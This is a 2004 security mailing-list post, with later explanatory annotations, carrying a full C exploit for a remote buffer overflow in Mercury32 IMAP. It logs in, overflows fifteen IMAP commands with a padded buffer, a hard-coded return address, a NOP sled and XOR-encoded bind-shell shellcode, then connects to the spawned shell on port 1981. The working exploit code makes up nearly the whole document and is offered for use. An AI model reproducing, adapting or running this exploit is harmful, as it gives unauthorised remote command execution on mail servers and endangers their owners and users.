[37586] in bugtraq
Remote Mercury32 Imap exploit
daemon@ATHENA.MIT.EDU (JohnH)
Thu Dec 2 21:45:32 2004
Message-ID: <007701c4d7fd$937829c0$9b01a8c0@server>
From: "JohnH" <johnh@secnetops.com>
To: <full-disclosure@lists.netsys.com>
Cc: <bugtraq@securityfocus.com>
Date: Wed, 1 Dec 2004 18:29:17 -0500
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0074_01C4D7D3.AA809000"
This is a multi-part message in MIME format.
------=_NextPart_000_0074_01C4D7D3.AA809000
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
Here you go guys. A fully working remote Mercury32 IMAP exploit. The author's claim is that it works on any Windows OS ("100% universal"); the code itself supports that claim only so far: the return address 0x01f9c8fa is hard-coded and the embedded shellcode's own comment names 2k/XP/2003, so treat "universal" as unverified outside those. The "14 possible targets" are IMAP commands selectable with -t (the source actually enumerates 15 of them, types 0-14), not 14 operating systems.
Again, someone posted some DoS code :(
Cheers,
Johnh@secnetops.com
Security Researcher
VISIT: www.secnetops.com
------=_NextPart_000_0074_01C4D7D3.AA809000
Content-Type: application/octet-stream;
name="ex_MERCURY2.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="ex_MERCURY2.c"
/** Remote Mercury32 Imap exploit [14 types of attacks - the -t switch actually accepts 15 values, 0-14] WOW!
 ** By: JohnH@secnetops.com
 **
 ** Notes: Second public release and both of them are Mercury32 ;)
 ** Again someone posted some DoS code :( why bother?
 ** If you spend the time to look, it uses the same buffer for all of the
 ** affected commands and the size does not change: the same 260-byte pad,
 ** return address, NOP sled and shellcode are sent regardless of which
 ** command prefix is selected. I did not check the asm but it is probably
 ** using the same routine for all of them (unverified - inferred from the
 ** identical overflow layout, not from the binary).
 **
 ** Date: 12/01/04
 **/
=0A=
#include <assert.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
=0A=
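#define version "1.0"   /* not referenced anywhere else in this file */

/* Prototypes. SendExploit() is defined after main() calls it, so without a
 * prototype that call relied on an implicit declaration - removed from the
 * language in C99 and rejected by current compilers. usage() and shell()
 * are declared here as well so every function has a visible prototype. */
int usage(char *p);
int SendExploit(void);
void shell(int sock);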
=0A=
=0A=
/* Payload that is copied verbatim into the overflow line right after the
 * NOP sled (see SendExploit):
 *
 *   bytes   0..21   decoder stub, plain x86 (22 bytes)
 *   bytes  22..288  ey4s's "sc_bind_1981" bind shell, every byte XORed
 *                   with 0x96 (267 = 0x10B bytes, matching the original
 *                   comment; the first byte decodes to 0xE8, a call)
 *   bytes 289..292  "EY4S" - the sentinel the decoder loop stops on
 *
 * The stub obtains its own address with the jmp/call/pop trick, then walks
 * forward XORing each byte with 0x96 until the 4-byte sentinel is seen and
 * jumps into the decoded bytes. Only the stub was checked by hand here;
 * the 267-byte body is third-party, opaque shellcode taken on trust from
 * its comment (bind shell on TCP/1981, 2k/XP/2003) - decode and
 * disassemble it before running it against anything real. The encoded
 * bytes contain no 0x00 (it is placed with strlen()/memcpy) and no
 * 0x0A/0x0D (it travels inside a single IMAP command line); keep it
 * that way if it is ever replaced. */
char sc_bind[] =
    /* ---- decoder stub ---- */
    "\xEB\x0F"                   /* jmp  short +0x0f      -> the call below    */
    "\x5B"                       /* pop  ebx              ; ebx = &payload     */
    "\x80\x33\x96"               /* xor  byte [ebx], 0x96                      */
    "\x43"                       /* inc  ebx                                   */
    "\x81\x3B\x45\x59\x34\x53"   /* cmp  dword [ebx], "EY4S"                   */
    "\x75\xF4"                   /* jne  back to the xor                       */
    "\x74\x05"                   /* je   over the call, into the decoded body  */
    "\xE8\xEC\xFF\xFF\xFF"       /* call back to the pop (pushes &payload)     */
    /* ---- XOR(0x96)-encoded bind shell, 267 bytes ---- */
    "\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
    "\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
    "\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
    "\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
    "\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
    "\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
    "\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
    "\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
    "\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
    "\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
    "\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
    "\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
    "\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
    "\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
    "\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
    "\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
    /* ---- sentinel the decoder stops on ---- */
    "\x45\x59\x34\x53";
=0A=
/* Command-line state shared between main() (which fills it in) and
 * SendExploit() (which reads it). Zero-initialised as file-scope objects. */
int type;            /* -t: which IMAP command prefix to send; SendExploit maps 0..14 */
int iPort=143;       /* -p: IMAP port on the target; plain IMAP, nothing here speaks TLS */
char *ip=NULL;       /* -h: target host, required (main refuses to run without it) */
char username[256];  /* -u: IMAP account; goes out in the clear in the LOGIN line */
char password[256];  /* -P: its password, likewise in the clear */
=0A=
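/* Parse S as a decimal integer in [lo, hi]; on anything else report WHAT and
 * exit. The original used atoi(), which silently turns garbage into 0 - a
 * port of 0 or a type of 0 then went on the wire without anyone noticing. */
static int parse_int(const char *s, long lo, long hi, const char *what)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v < lo || v > hi) {
        fprintf(stderr, "[-] Invalid %s: '%s' (expected %ld..%ld)\n", what, s, lo, hi);
        exit(EXIT_FAILURE);
    }
    return (int)v;
}

/* Entry point: parse -u/-P/-h/-p/-t into the file-scope globals and hand off
 * to SendExploit(). Returns 0 in every case; usage() exits on its own.
 * -t is bounded to 0..14, the range SendExploit's command table covers. */
int main(int argc, char **argv)
{
    int c;

    if (argc < 2) {
        usage(argv[0]);
        return 0;
    }

    while ((c = getopt(argc, argv, "u:P:h:p:t:")) != -1) {
        switch (c) {
        case 'u':
            /* snprintf always NUL-terminates; strncpy only did so because the
             * globals start zeroed and one byte was held back. */
            snprintf(username, sizeof username, "%s", optarg);
            break;
        case 'P':
            snprintf(password, sizeof password, "%s", optarg);
            break;
        case 'h':
            ip = optarg;
            break;
        case 'p':
            iPort = parse_int(optarg, 1, 65535, "port");
            break;
        case 't':
            type = parse_int(optarg, 0, 14, "type");
            break;
        default:
            usage(argv[0]);
            return 0;
        }
    }

    if (ip == NULL) {
        /* Print before usage(): usage() exits, so the original's message
         * after it was unreachable. */
        printf("[-] Invalid parameter.\n");
        usage(argv[0]);
        return 0;
    }

    if (username[0] == '\0' || password[0] == '\0')
        fprintf(stderr, "[!] No -u/-P given: the LOGIN line will carry empty credentials.\n");

    SendExploit();
    return 0;
}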
=0A=
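/* ripped from TESO code */

/* write() all LEN bytes to FD, retrying on short writes and EINTR; -1 on error.
 * The original fired a single write() and ignored its result. */
static int write_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = write(fd, buf, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Interactive relay between stdin/stdout and SOCK (the bind shell's socket).
 * Never returns: exit(EXIT_FAILURE) on local EOF, remote close or any error.
 * Everything crosses the network in the clear, like the rest of this tool. */
void shell(int sock)
{
    char buf[512];
    fd_set rfds;

    if (sock < 0 || sock >= FD_SETSIZE) {
        /* FD_SET on an out-of-range descriptor is undefined behaviour. */
        fprintf(stderr, "\n - Socket %d not usable with select()\n", sock);
        exit(EXIT_FAILURE);
    }

    for (;;) {
        /* FD_ZERO every round: the original never cleared rfds at all, so
         * select() was handed an uninitialised set (undefined behaviour). */
        FD_ZERO(&rfds);
        FD_SET(0, &rfds);
        FD_SET(sock, &rfds);

        if (select(sock + 1, &rfds, NULL, NULL, NULL) < 0) {
            if (errno == EINTR)
                continue;
            perror("select");
            exit(EXIT_FAILURE);
        }

        if (FD_ISSET(0, &rfds)) {
            ssize_t l = read(0, buf, sizeof buf);
            if (l <= 0) {
                printf("\n - Connection closed by local user\n");
                exit(EXIT_FAILURE);
            }
            if (write_all(sock, buf, (size_t)l) < 0) {
                perror("write");
                exit(EXIT_FAILURE);
            }
        }

        if (FD_ISSET(sock, &rfds)) {
            ssize_t l = read(sock, buf, sizeof buf);
            if (l == 0) {
                printf("\n - Connection closed by remote host.\n");
                exit(EXIT_FAILURE);
            } else if (l < 0) {
                printf("\n - Read failure\n");
                exit(EXIT_FAILURE);
            }
            if (write_all(1, buf, (size_t)l) < 0) {
                perror("write");
                exit(EXIT_FAILURE);
            }
        }
    }
}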
=0A=
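/* One command prefix per -t value; index == type. The header comment says
 * every one of these reaches the same overflow with the same layout, which
 * is why nothing but the prefix differs between types. */
static const char *const imap_cmds[] = {
    "a001 EXAMINE ",     /* 0 */
    "a001 SUBSCRIBE ",   /* 1 */
    "a001 STATUS ",      /* 2 */
    "a001 APPEND ",      /* 3 */
    "a001 CHECK ",       /* 4 */
    "a001 CLOSE ",       /* 5 */
    "a001 EXPUNGE ",     /* 6 */
    "a001 FETCH ",       /* 7 */
    "a001 RENAME ",      /* 8 */
    "a001 DELETE ",      /* 9 */
    "a001 LIST ",        /* 10 */
    "a001 SEARCH ",      /* 11 */
    "a001 CREATE ",      /* 12 */
    "a001 UNSUBSCRIBE ", /* 13 */
    "a001 SELECT ",      /* 14 */
};
#define NUM_IMAP_CMDS (sizeof imap_cmds / sizeof imap_cmds[0])

enum {
    PAD_LEN       = 260,   /* 'A' bytes before the saved return address is reached */
    NOP_LEN       = 100,   /* NOP sled between the return address and sc_bind */
    BIND_PORT     = 1981,  /* where sc_bind is expected to listen (per its comment) */
    GREETING_WAIT = 3,     /* seconds; the banner is never read, only waited out */
    BIND_WAIT     = 5      /* seconds for the shellcode to bind before we connect */
};

/* Value written over the saved return address. Hard-coded, so the exploit
 * is only as "universal" as this address is stable across target builds;
 * with a NOP sled right behind it, presumably a trampoline into the sled -
 * not verified here. Always emitted little-endian (x86 target). */
#define RET_ADDR 0x01f9c8faUL

/* Resolve HOST to an IPv4 address into OUT; -1 (message printed) on failure.
 * The original resolved the name but then connected to inet_addr(ip), so
 * only dotted-quad targets ever worked. */
static int resolve_ipv4(const char *host, struct in_addr *out)
{
    struct hostent *he = gethostbyname(host);

    if (he == NULL) {
        herror("Resolving host");
        return -1;
    }
    if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof *out) {
        fprintf(stderr, "[-] %s did not resolve to an IPv4 address\n", host);
        return -1;
    }
    /* memcpy rather than *(unsigned int *)he->h_addr: no aliasing/alignment UB */
    memcpy(out, he->h_addr_list[0], sizeof *out);
    return 0;
}

/* Blocking TCP connect to ADDR:PORT; returns the socket, or -1 after
 * printing the reason. */
static int tcp_connect(struct in_addr addr, int port)
{
    struct sockaddr_in peer;
    int s = socket(AF_INET, SOCK_STREAM, 0);

    if (s < 0) {
        perror("socket");
        return -1;
    }
    memset(&peer, 0, sizeof peer);
    peer.sin_family = AF_INET;
    peer.sin_port = htons((unsigned short)port);
    peer.sin_addr = addr;
    if (connect(s, (struct sockaddr *)&peer, sizeof peer) < 0) {
        perror("connect");
        close(s);
        return -1;
    }
    return s;
}

/* send() all LEN bytes, retrying on short sends and EINTR; -1 on error. */
static int send_all(int s, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = send(s, buf, len, 0);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Build the overflow line for type T into BUF:
 *   imap_cmds[T] + PAD_LEN*'A' + RET_ADDR (LE) + NOP_LEN*0x90 + sc_bind + CRLF
 * Returns the byte count, or 0 if CAP is too small. */
static size_t build_payload(char *buf, size_t cap, int t)
{
    const char *cmd = imap_cmds[t];
    size_t cmdlen = strlen(cmd);
    size_t sclen = strlen(sc_bind);   /* sc_bind has no NUL until its terminator */
    size_t need = cmdlen + PAD_LEN + 4 + NOP_LEN + sclen + 2;
    unsigned char *p = (unsigned char *)buf;
    size_t x = 0;

    if (need > cap)
        return 0;

    memcpy(p + x, cmd, cmdlen);
    x += cmdlen;
    memset(p + x, 0x41, PAD_LEN);
    x += PAD_LEN;
    /* Explicit byte order: the target is x86, the attacking host may not be.
     * The original did *(unsigned int *)&buffer[x] = RET_ADDR, which is
     * host-endian and an aliasing violation besides. */
    p[x++] = (unsigned char)(RET_ADDR & 0xff);
    p[x++] = (unsigned char)((RET_ADDR >> 8) & 0xff);
    p[x++] = (unsigned char)((RET_ADDR >> 16) & 0xff);
    p[x++] = (unsigned char)((RET_ADDR >> 24) & 0xff);
    memset(p + x, 0x90, NOP_LEN);
    x += NOP_LEN;
    memcpy(p + x, sc_bind, sclen);
    x += sclen;
    memcpy(p + x, "\r\n", 2);
    x += 2;
    return x;
}

/* Log in, send the overflow line for the selected type, then connect to the
 * bind shell and hand the socket to shell(). Reads ip/iPort/type/username/
 * password from the file-scope globals. Returns 0 on success (in practice
 * shell() never returns), -1 after printing an error otherwise.
 *
 * Nothing from the server is ever read: success is inferred purely from
 * being able to reach BIND_PORT afterwards. */
int SendExploit(void)
{
    struct in_addr target;
    char login[1024];
    char payload[9000];
    int s, s2, n;
    size_t plen;

    printf("MERCURY32 Imap exploit\n");
    printf("By: JohnH@secnetops.com\n");
    printf("[+] Entering God Mode\n");

    if (type < 0 || (size_t)type >= NUM_IMAP_CMDS) {
        /* The original had no check and sent a bare pad with no command. */
        fprintf(stderr, "[-] type must be 0..%d\n", (int)NUM_IMAP_CMDS - 1);
        return -1;
    }

    /* LOGIN goes first, so the vulnerable handlers are presumably only
     * reachable post-authentication (not confirmed here). Credentials cross
     * the wire in the clear - plain port 143, no STARTTLS. The bare LF and
     * the reuse of tag a001 are kept from the original. */
    n = snprintf(login, sizeof login, "a001 LOGIN %s %s\n", username, password);
    if (n < 0 || (size_t)n >= sizeof login) {
        fprintf(stderr, "[-] LOGIN line too long\n");
        return -1;
    }

    printf("[+] Using type: %d\n", type);
    plen = build_payload(payload, sizeof payload, type);
    if (plen == 0) {
        fprintf(stderr, "[-] payload does not fit in buffer\n");
        return -1;
    }

    if (resolve_ipv4(ip, &target) < 0)
        return -1;

    s = tcp_connect(target, iPort);
    if (s < 0)
        return -1;
    printf("[+] connect to %s:%d success.\n", ip, iPort);
    sleep(GREETING_WAIT);

    if (send_all(s, login, (size_t)n) < 0 || send_all(s, payload, plen) < 0) {
        perror("send");
        close(s);
        return -1;
    }
    printf("[+] Sent: %d\n", n);
    printf("[+] Sent: %d\n", (int)plen);

    printf("[+] Wait for shell.\n");
    sleep(BIND_WAIT);
    /* The IMAP socket is deliberately left open here, as in the original;
     * whether an early close would disturb the server-side thread while
     * the shellcode is starting is not known - TODO confirm before changing. */
    s2 = tcp_connect(target, BIND_PORT);
    if (s2 < 0) {
        close(s);
        return -1;
    }
    printf("[+] We got a shell \n");

    /* The bind shell is unauthenticated: anyone who can reach TCP/1981 on
     * the target gets the same shell for as long as it lives. Lab networks
     * only, and shut it down when done. */
    shell(s2);   /* does not return: exits on EOF or error */

    close(s2);
    close(s);
    return 0;
}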
=0A=
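/* Print the command-line summary and exit(0) (never returns, despite the int
 * return type). P is argv[0]. The original advertised "-p" for both the
 * password and the port; the password switch is actually -P, and the 14
 * "types" it told the reader to dig out of the source are listed here. */
int usage(char *p)
{
    const char *prog = p ? p : "ex_MERCURY2";

    printf("MERCURY32 Imap Remote Exploit\n");
    printf("By: JohnH@secnetops.com\n");
    printf("Usage: %s <-u username> <-P password> <-h host> <-p port> <-t type>\n", prog);
    printf("Possible types (-t), all sent after a LOGIN with the given credentials:\n"
           "   0 EXAMINE     1 SUBSCRIBE   2 STATUS      3 APPEND      4 CHECK\n"
           "   5 CLOSE       6 EXPUNGE     7 FETCH       8 RENAME      9 DELETE\n"
           "  10 LIST       11 SEARCH     12 CREATE     13 UNSUBSCRIBE 14 SELECT\n");
    exit(0);
}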
=0A=
=0A=
------=_NextPart_000_0074_01C4D7D3.AA809000--